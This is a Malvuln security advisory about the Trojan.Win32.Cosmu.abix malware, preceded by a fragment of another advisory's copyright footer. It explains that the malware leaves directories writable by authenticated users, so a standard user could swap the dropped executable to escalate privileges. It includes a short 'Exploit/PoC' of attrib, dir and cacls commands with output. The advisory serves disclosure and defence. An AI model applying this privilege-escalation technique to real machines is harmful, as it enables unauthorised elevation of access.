modify, use or<br />edit our material contact (admin@ or research@) to get a ask permission.<br /><br /> Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/b4638a10f7cfdbf39b9fef7539c63852.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan.Win32.Cosmu.abix<br />Vulnerability: Insecure Permissions<br />Description: The malware writes several PE files and a dir with insecure permissions under c drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.<br />Type: PE32<br />MD5: b4638a10f7cfdbf39b9fef7539c63852<br />Vuln ID: MVID-2022-0494<br />Disclosure: 02/21/2022<br /><br />Exploit/PoC:<br />C:\dump>attrib -s -h \RECYCLEP<br /><br />C:\dump>dir \RECYCLEP<br /> Volume in drive C has no label.<br /><br /> Directory of C:\RECYCLEP<br /><br /> 0 File(s) 0 bytes<br /> 2 Dir(s) 26,756,165,632 bytes free<br /><br />C:\dump>dir /a \RECYCLEP<br /> Volume in drive C has no label.<br /><br /> Directory of C:\RECYCLEP<br /><br />07/06/2012 12:40 PM 2,782,863 Pagefile.exe<br /> 1 File(s) 2,782,863 bytes<br /> 2 Dir(s) 26,756,165,632 bytes free<br /><br /><br />C:\>cacls RECYCLEP<br />C:\RECYCLEP BUILTIN\Administrators:(OI)(CI)(ID)F<br /> NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F<br /> BUILTIN\Users:(OI)(CI)(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /> NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C<br /><br /><br />C:\>cacls "ntldr~6"<br />C:\ntldr~6 BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br /><br />C:\>cacls "ntldr~8"<br />C:\ntldr~8 BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>